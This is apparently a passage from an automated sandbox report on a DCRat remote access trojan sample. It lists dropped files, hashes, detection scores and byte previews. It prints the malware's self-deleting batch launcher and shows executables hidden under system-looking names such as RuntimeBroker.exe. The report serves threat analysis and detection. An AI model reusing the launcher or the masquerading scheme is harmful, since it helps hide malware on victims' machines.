                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 74%
                                                Reputation:low
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..........".......&...........'.. ... '...@.. .......................`'.......'...@.................................4.'.W.... '.p....................@'...................................................... ............... ..H............text.....&.. ....&................. ..`.rsrc...p.... '.......&.............@..@.reloc.......@'.......&.............@..B................p.'.....H............5".........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                C:\Program Files (x86)\Reference Assemblies\DZNTXHJCUWXUTqOrRrGotfqdMP.exe:Zone.Identifier

                                                Download File
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):26
                                                Entropy (8bit):3.95006375643621
                                                Encrypted:false
                                                SSDEEP:3:ggPYV:rPYV
                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                Malicious:true
                                                Reputation:high, very likely benign file
                                                Preview:[ZoneTransfer]....ZoneId=0

                                                C:\Program Files (x86)\Windows Sidebar\981c2098d799b6

                                                Download File
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:ASCII text, with very long lines (369), with no line terminators
                                                Category:dropped
                                                Size (bytes):369
                                                Entropy (8bit):5.820982261992436
                                                Encrypted:false
                                                SSDEEP:6:c+T11s25C9MVLftiwycN1/SLN6vLrri99cCJ4t3ik0H8DxSExKVypFBn:9TbDeMxYaSJKLrri9myHkNxDB
                                                MD5:28B02BFD6977004B570D7B92AF3BC8B6
                                                SHA1:A64951D5528068B4BE773F8F61815F1856608462
                                                SHA-256:A9948ED0ACE3BB0DAA5D006667823E5B4E35822974D5C6E2724CB31B28FDB052
                                                SHA-512:6D2637442E1E7F1969053D32983720101A2F924EEAB4D5D684A30A3F125DF4CC43D5A1C01F60E2E960125344BD9F7E798E4C66F7E976B7A1C62114CC74322FE2
                                                Malicious:false
                                                Preview:wbyWHqolUGsgdgIqIOYTQqJXI3VEwdz9lYcwGIozeW7xRWZyfooBolGFSaNNUjy0Rs4FDWj9jjz4tVFwdgjIyxU9RWeq4ae5hGgibUuIEobFwMW6Ubtx9pCdY5xr13FJF3WmzgUJwaDJVPMFAiVdqq61ECKggDRLjSA3ztGxGkBim2HJssrThlcY7eixWyntJ2jDOTPQbiXGpXPL4ByyV7n80l5VKTbR6SYuTE4Yca19NVtjPX2V9yXLOlMnY4FIGFJW9f20HaW5Fnuf2VGxaGSI5Mfr1Q9hUt2ILWktfCOjccGk0rvCySrAxBbwAK80aykWvmTfvWRY1tqdG41Kf6sBB2UJ5xtVDXIn1tzNXPRbBTIEV

                                                C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe

                                                Download File
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):2551808
                                                Entropy (8bit):4.648835098499072
                                                Encrypted:false
                                                SSDEEP:24576:WCihq6FXaYuCw7sULqPyZwSxIshnWIjm7vZAjX+ez87TkQPI1QOmYNnNQ671:VihHsYIlwSx9WkiLekTk1FN
                                                MD5:48B90C11912E9C7147D86C55D1E2CC94
                                                SHA1:FFC71FB727607913AA176C85F75972F1AC6FDA7C
                                                SHA-256:BB0F507A87420A0597CDC40917EA1BA9C9576D3E750DB3F9B66802B19550C9E7
                                                SHA-512:175B7358DE82827CA29ECEF204FA2451BA44E3E3FC373F65BC40D2D888D43A5D0BC778A78F714E47369B8D9A5B37FAA4106E912BB53B13791714D1C7773431F8
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 74%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..........".......&...........'.. ... '...@.. .......................`'.......'...@.................................4.'.W.... '.p....................@'...................................................... ............... ..H............text.....&.. ....&................. ..`.rsrc...p.... '.......&.............@..@.reloc.......@'.......&.............@..B................p.'.....H............5".........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe:Zone.Identifier

                                                Download File
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):26
                                                Entropy (8bit):3.95006375643621
                                                Encrypted:false
                                                SSDEEP:3:ggPYV:rPYV
                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                Malicious:true
                                                Preview:[ZoneTransfer]....ZoneId=0

                                                C:\ProgramData\Adobe\981c2098d799b6

                                                Download File
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:ASCII text, with very long lines (356), with no line terminators
                                                Category:dropped
                                                Size (bytes):356
                                                Entropy (8bit):5.775149463646205
                                                Encrypted:false
                                                SSDEEP:6:gsaLuMJRpfmacOGu4QPhsVjCvC4q1mvUhcKZEw85RXHybvi0uuJf+72NM61rDBOm:iXUa98Cv79+mwCXHyu0RBgsV1XBOp+P
                                                MD5:941D7756AA0E9DC290F3616AEDB08C7B
                                                SHA1:F3B8F605FBEA22A1787E7B235149D5AFCDED2901
                                                SHA-256:E8F72C6C4BB467FCC62EBE661971312C3AD3241488A6657D3092CCC6A6E03BF2
                                                SHA-512:C12BD3B2EC6921DEF53C8ED5C371352AF43FBB5C6BFEC931E4756C02F59918F421827D7B0544639447B806C377C68A61EE118519190C23E1A569AFD6543BEE88
                                                Malicious:false
                                                Preview:KZdSOCo2YIPf7epDnb3li5w1UtUZEHFOSHn2VjdlGaNR5QvLlxFCHZxOnl8fsOxQDBN01xsE7SeHre6D7JxQCCG3TYOtl831n6O4D5UxFAFz4phIp4hjbgOA4Tgci9d9YnevPCACzALB6R8o1FDqbUaGsN9tY1PGhFbRLv3n4euaUMDnV2lc5wiEMYDCCQn7uFd10rcFMaw6k9vfJWYgQwKvhWEws0ln0wqPtMxnZfPfAldMmi2q1Hr84sTdnpXWzIGxTgw6ivGuhpv631KK74wtEsUA3UAtI3q1fp3Gv6HGA7bP7WjvfMY4WWslLvDOvWmn93bN8DYBxqsHRFDguPO5fvfI7R4A23Un

                                                C:\ProgramData\Adobe\DZNTXHJCUWXUTqOrRrGotfqdMP.exe

                                                Download File
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):2551808
                                                Entropy (8bit):4.648835098499072
                                                Encrypted:false
                                                SSDEEP:24576:WCihq6FXaYuCw7sULqPyZwSxIshnWIjm7vZAjX+ez87TkQPI1QOmYNnNQ671:VihHsYIlwSx9WkiLekTk1FN
                                                MD5:48B90C11912E9C7147D86C55D1E2CC94
                                                SHA1:FFC71FB727607913AA176C85F75972F1AC6FDA7C
                                                SHA-256:BB0F507A87420A0597CDC40917EA1BA9C9576D3E750DB3F9B66802B19550C9E7
                                                SHA-512:175B7358DE82827CA29ECEF204FA2451BA44E3E3FC373F65BC40D2D888D43A5D0BC778A78F714E47369B8D9A5B37FAA4106E912BB53B13791714D1C7773431F8
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 74%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..........".......&...........'.. ... '...@.. .......................`'.......'...@.................................4.'.W.... '.p....................@'...................................................... ............... ..H............text.....&.. ....&................. ..`.rsrc...p.... '.......&.............@..@.reloc.......@'.......&.............@..B................p.'.....H............5".........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                C:\ProgramData\Adobe\DZNTXHJCUWXUTqOrRrGotfqdMP.exe:Zone.Identifier

                                                Download File
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):26
                                                Entropy (8bit):3.95006375643621
                                                Encrypted:false
                                                SSDEEP:3:ggPYV:rPYV
                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                Malicious:false
                                                Preview:[ZoneTransfer]....ZoneId=0

                                                C:\Recovery\9e8d7a4ca61bd9

                                                Download File
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:ASCII text, with very long lines (837), with no line terminators
                                                Category:dropped
                                                Size (bytes):837
                                                Entropy (8bit):5.885200984433089
                                                Encrypted:false
                                                SSDEEP:24:gWEQXe2gQYOjLNydAP4L0gxn6bw4vXgitGBWm:LpgQYOjLYAP4QIYw4P/7m
                                                MD5:68C50223E56C79A4B44A7826D73FFA00
                                                SHA1:802554A413210F4134773E1AB5DD6391014A81CB
                                                SHA-256:D0811668F2D8448F7F1A3823B82F628FE9FA013D96061AF0146A1E611E21AC41
                                                SHA-512:37A5066B7BF1876AD07A72DD73AC475BB37AF20AA4E61F62FE9DA90D6F70721F2B57DD6ECAB9F9A3530A591EACF334377E2CEAE95321470179A35C419E323F1B
                                                Malicious:false
                                                Preview:oozWl8SC9N4PgerrHyeovwJWgOaMI81VmL1gHbR9SeE9VTaBijzqbnE2fczWhF4BVimUnLkpgeVQrJANyYoiIK49H8Bom5cNkCowqGYX9JK6RyKVcmiIbW3LomMoJ6DlCHppfNgsAQj8A7sSyqL9WTwOJcID3tNDGi4JIfzOF0IKx4Lq440duDOsVbfDFdyQDf2bDiKT073gLmbPRbI93uSCULyr9wJmB1GRCumWtgmxKrgsAQwnUzXSNzG2ucTExReUfJMhywPWHf2moFqt9fSMexEMnumRMh92MMN0DPyhkALr6dNovkES9S0rF93EK8Kkg9Zc10puquldmWPJh7fmcr33VguDVuWm0kL6Euw55TlOrWEttuhNchHzGfGVFlZ5X9nBLSFwKkqIFoM9bBUlNJJSdW0iobzT4p0rtChaouC218tbTH4ERxsO0VizchItuXOayfPYe36cGQbfmYOghvCG7m0Yes8HmTIduTnx1fkY0PHk3CMDSlL9UHcLo14v4zzxI7vTvboCLoPsfQebf4yBHJJm0cJ9kydBZTb6R3S17Jxq1upYXcPAAyp9yIdSRobWKOSLyhKml7E7VcvFwumHicAkncIJa9jSsagmcdj0SnYDusoWWXghCTyrOriVZAMmXvP46InTKwz5E605ywwCdCQYmyYu5OaSawq9ctZOtMWQe3nR1mgmNJIVe0RIt3X6VheSQ1dEWiTQpA4tKH3TryEQnVelcRe0za46YVBAIcQp01pe6i7m9EPhcNo5X1mEDdbPF7UzF3KPhYavp9p4U20vLXdLqGmRzLlXaaY8NIgG399Ex2PXLsuLmqErd

                                                C:\Recovery\RuntimeBroker.exe

                                                Download File
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):2551808
                                                Entropy (8bit):4.648835098499072
                                                Encrypted:false
                                                SSDEEP:24576:WCihq6FXaYuCw7sULqPyZwSxIshnWIjm7vZAjX+ez87TkQPI1QOmYNnNQ671:VihHsYIlwSx9WkiLekTk1FN
                                                MD5:48B90C11912E9C7147D86C55D1E2CC94
                                                SHA1:FFC71FB727607913AA176C85F75972F1AC6FDA7C
                                                SHA-256:BB0F507A87420A0597CDC40917EA1BA9C9576D3E750DB3F9B66802B19550C9E7
                                                SHA-512:175B7358DE82827CA29ECEF204FA2451BA44E3E3FC373F65BC40D2D888D43A5D0BC778A78F714E47369B8D9A5B37FAA4106E912BB53B13791714D1C7773431F8
                                                Malicious:true
                                                Yara Hits:
                                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Recovery\RuntimeBroker.exe, Author: Joe Security
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 74%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..........".......&...........'.. ... '...@.. .......................`'.......'...@.................................4.'.W.... '.p....................@'...................................................... ............... ..H............text.....&.. ....&................. ..`.rsrc...p.... '.......&.............@..@.reloc.......@'.......&.............@..B................p.'.....H............5".........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                C:\Recovery\RuntimeBroker.exe:Zone.Identifier

                                                Download File
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):26
                                                Entropy (8bit):3.95006375643621
                                                Encrypted:false
                                                SSDEEP:3:ggPYV:rPYV
                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                Malicious:true
                                                Preview:[ZoneTransfer]....ZoneId=0

                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\A5EbyKyjhV.exe.log

                                                Download File
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:modified
                                                Size (bytes):1698
                                                Entropy (8bit):5.367720686892084
                                                Encrypted:false
                                                SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHVHmHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKkt1GqZ4x
                                                MD5:5E2B46F197ED0B7FCCD1F26C008C2CD1
                                                SHA1:17B1F616C3D13F341565C71A7520BD788BCCC07D
                                                SHA-256:AF902415FD3BA2B023D7ACE463D9EB77114FC3678073C0FFD66A1728578FD265
                                                SHA-512:5E6CEEFD6744B078ADA7E188AEC87CD4EE7FDAD5A9CC661C8217AC0A177013370277A381DFE8FF2BC237F48A256E1144223451ED2EC292C00811C14204993B50
                                                Malicious:true
                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                                                C:\Users\user\AppData\Local\Temp\6GXacmGvF1

                                                Download File
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):25
                                                Entropy (8bit):4.243856189774724
                                                Encrypted:false
                                                SSDEEP:3:19MOrWhhL8q91n:3G8G1
                                                MD5:4E8F8F190E17E62387F973BE00412A47
                                                SHA1:936ABBA6D019F103BBCAC90631197D76CCA99856
                                                SHA-256:F3B51EDA29DAB13706296B5B241D3915C8862308ED973955060967A3F7A7DACE
                                                SHA-512:D28D668A6954F33DA278635AA49C6A68CB4568EA5054DE996F66E8905C3502CE0EE19865DF27DDD578D06F23AEAF8FA9D84DD412B4FD6371E1C4299DB899E802
                                                Malicious:false
                                                Preview:UeXiW8N3KLsAJBwdnUlAO3XQi

                                                C:\Users\user\AppData\Local\Temp\kAhb7GGyxn.bat

                                                Download File
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):201
                                                Entropy (8bit):5.450949129624606
                                                Encrypted:false
                                                SSDEEP:6:hCRLuVFOOr+DER5SMLDYnLsZKOZG1cNwi23fN3w:CuVEOCDEfSMoQYZ1g
                                                MD5:0496E721F6042AE22DDEE6D73F64F869
                                                SHA1:3346C92EFB19B296AEE0F92D2B3D85254B65E35A
                                                SHA-256:70FF5F0CFF0A6F51C291C4290D6A514AEA5905DA85CBDDD35EC656049A98B96F
                                                SHA-512:F6E5EDD827634B8E4CB8AD86730DF960CB53E0F4C02DEA7B480D444776037B3D99EF9C6900ACBC826F102B23B3E33C9177CF41F849AC62B7FAA0385A212D82A2
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Program Files (x86)\windows sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\kAhb7GGyxn.bat"

                                                C:\Users\user\Desktop\AlRNHzIf.log

                                                Download File
                                                Process:C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):38912
                                                Entropy (8bit):5.679286635687991
                                                Encrypted:false
                                                SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                MD5:9E910782CA3E88B3F87826609A21A54E
                                                SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 8%
                                                Joe Sandbox View:
                                                • Filename: qNdO4D18CF.exe, Detection: malicious, Browse
                                                • Filename: iN1fhAtzW2.exe, Detection: malicious, Browse
                                                • Filename: based.exe, Detection: malicious, Browse
                                                • Filename: RustChecker.exe, Detection: malicious, Browse
                                                • Filename: main.exe, Detection: malicious, Browse
                                                • Filename: file_1443.exe, Detection: malicious, Browse
                                                • Filename: lsass.exe, Detection: malicious, Browse
                                                • Filename: dvc2TBOZTh.exe, Detection: malicious, Browse
                                                • Filename: teh76E2k50.exe, Detection: malicious, Browse
                                                • Filename: FuWRu2Mg82.exe, Detection: malicious, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                C:\Users\user\Desktop\CYBeSaFD.log

                                                Download File
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):33280
                                                Entropy (8bit):5.634433516692816
                                                Encrypted:false
                                                SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 8%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                C:\Users\user\Desktop\DyXMTSsE.log

                                                Download File
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):126976
                                                Entropy (8bit):6.057993947082715
                                                Encrypted:false
                                                SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                MD5:16B480082780CC1D8C23FB05468F64E7
                                                SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 21%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                C:\Users\user\Desktop\EZjMkwXT.log

                                                Download File
                                                Process:C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):50176
                                                Entropy (8bit):5.723168999026349
                                                Encrypted:false
                                                SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                MD5:2E116FC64103D0F0CF47890FD571561E
                                                SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 17%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                C:\Users\user\Desktop\HLTcvXUr.log

                                                Download File
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):70144
                                                Entropy (8bit):5.909536568846014
                                                Encrypted:false
                                                SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 29%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                C:\Users\user\Desktop\HSyuVsJS.log

                                                Download File
                                                Process:C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):40448
                                                Entropy (8bit):5.7028690200758465
                                                Encrypted:false
                                                SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 12%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                C:\Users\user\Desktop\HbVuFfcO.log

                                                Download File
                                                Process:C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):41472
                                                Entropy (8bit):5.6808219961645605
                                                Encrypted:false
                                                SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 17%
